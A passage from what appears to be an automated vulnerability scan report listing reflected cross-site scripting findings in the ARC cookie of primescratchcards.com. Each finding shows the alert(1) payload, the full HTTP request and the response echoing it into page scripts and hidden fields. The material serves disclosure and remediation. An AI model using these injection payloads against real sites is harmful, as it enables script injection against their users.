Cookie: ARC=130137bcf11--><script>alert(1)</script>7a152d745f7; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22388
Content-Type: text/html
Set-Cookie: ARC=130137bcf11%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7a152d745f7; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bcf11--><script>alert(1)</script>7a152d745f7">
...[SNIP]...

3.353. http://www.primescratchcards.com/help.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e18c"%3balert(1)//5fae78ef75a was submitted in the ARC cookie. This input was echoed as 3e18c";alert(1)//5fae78ef75a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373e18c"%3balert(1)//5fae78ef75a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20819
Content-Type: text/html
Set-Cookie: ARC=1301373e18c%22%3Balert%281%29%2F%2F5fae78ef75a; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373e18c";alert(1)//5fae78ef75a' border='0' width='1' height='1'>
...[SNIP]...

3.354. http://www.primescratchcards.com/help.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/help.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload fd99e--><script>alert(1)</script>90104150d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137fd99e--><script>alert(1)</script>90104150d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20861
Content-Type: text/html
Set-Cookie: ARC=130137fd99e%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E90104150d; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137fd99e--><script>alert(1)</script>90104150d">
...[SNIP]...

3.355. http://www.primescratchcards.com/help.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4be8c'%3balert(1)//4c16ed10fec was submitted in the ARC cookie. This input was echoed as 4be8c';alert(1)//4c16ed10fec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374be8c'%3balert(1)//4c16ed10fec; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20819
Content-Type: text/html
Set-Cookie: ARC=1301374be8c%27%3Balert%281%29%2F%2F4c16ed10fec; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301374be8c';alert(1)//4c16ed10fec&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.356. http://www.primescratchcards.com/index.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0367"%3balert(1)//8f7b742c961 was submitted in the ARC cookie. This input was echoed as f0367";alert(1)//8f7b742c961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f0367"%3balert(1)//8f7b742c961; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 7618
Content-Type: text/html
Set-Cookie: ARC=130137f0367%22%3Balert%281%29%2F%2F8f7b742c961; expires=Tue, 15-May-2012 12:34:40 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f0367";alert(1)//8f7b742c961' border='0' width='1' height='1'>
...[SNIP]...

3.357. http://www.primescratchcards.com/index.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b79ec'%3balert(1)//9fa2a0ee66b was submitted in the ARC cookie. This input was echoed as b79ec';alert(1)//9fa2a0ee66b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b79ec'%3balert(1)//9fa2a0ee66b; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 7618
Content-Type: text/html
Set-Cookie: ARC=130137b79ec%27%3Balert%281%29%2F%2F9fa2a0ee66b; expires=Tue, 15-May-2012 12:34:40 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137b79ec';alert(1)//9fa2a0ee66b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.358. http://www.primescratchcards.com/index.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 8b084--><script>alert(1)</script>f263172694a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378b084--><script>alert(1)</script>f263172694a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 7666
Content-Type: text/html
Set-Cookie: ARC=1301378b084%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef263172694a; expires=Tue, 15-May-2012 12:34:42 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301378b084--><script>alert(1)</script>f263172694a">
...[SNIP]...

3.359. http://www.primescratchcards.com/media.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21188'%3balert(1)//3398f0ac2c6 was submitted in the ARC cookie. This input was echoed as 21188';alert(1)//3398f0ac2c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013721188'%3balert(1)//3398f0ac2c6; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22115
Content-Type: text/html
Set-Cookie: ARC=13013721188%27%3Balert%281%29%2F%2F3398f0ac2c6; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013721188';alert(1)//3398f0ac2c6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.360. http://www.primescratchcards.com/media.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2ff5"%3balert(1)//38f246d6bff was submitted in the ARC cookie. This input was echoed as b2ff5";alert(1)//38f246d6bff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b2ff5"%3balert(1)//38f246d6bff; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22115
Content-Type: text/html
Set-Cookie: ARC=130137b2ff5%22%3Balert%281%29%2F%2F38f246d6bff; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137b2ff5";alert(1)//38f246d6bff' border='0' width='1' height='1'>
...[SNIP]...

3.361. http://www.primescratchcards.com/media.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/media.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload df65f--><script>alert(1)</script>47c80733f8a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137df65f--><script>alert(1)</script>47c80733f8a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22163
Content-Type: text/html
Set-Cookie: ARC=130137df65f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E47c80733f8a; expires=Tue, 15-May-2012 12:35:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137df65f--><script>alert(1)</script>47c80733f8a">
...[SNIP]...

3.362. http://www.primescratchcards.com/playersclub.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/playersclub.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 74d6f--><script>alert(1)</script>8f025fcf095 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013774d6f--><script>alert(1)</script>8f025fcf095; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25909
Content-Type: text/html
Set-Cookie: ARC=13013774d6f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8f025fcf095; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013774d6f--><script>alert(1)</script>8f025fcf095">
...[SNIP]...

3.363. http://www.primescratchcards.com/playersclub.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b0bd'-alert(1)-'c3abf5ca796 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301376b0bd'-alert(1)-'c3abf5ca796; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25861
Content-Type: text/html
Set-Cookie: ARC=1301376b0bd%27%2Dalert%281%29%2D%27c3abf5ca796; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301376b0bd'-alert(1)-'c3abf5ca796&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.364. http://www.primescratchcards.com/playersclub.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a817f"%3balert(1)//ab581ff1033 was submitted in the ARC cookie. This input was echoed as a817f";alert(1)//ab581ff1033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a817f"%3balert(1)//ab581ff1033; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25895
Content-Type: text/html
Set-Cookie: ARC=130137a817f%22%3Balert%281%29%2F%2Fab581ff1033; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137a817f";alert(1)//ab581ff1033' border='0' width='1' height='1'>
...[SNIP]...

3.365. http://www.primescratchcards.com/promotions.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35b5a'%3balert(1)//6459e002c93 was submitted in the ARC cookie. This input was echoed as 35b5a';alert(1)//6459e002c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
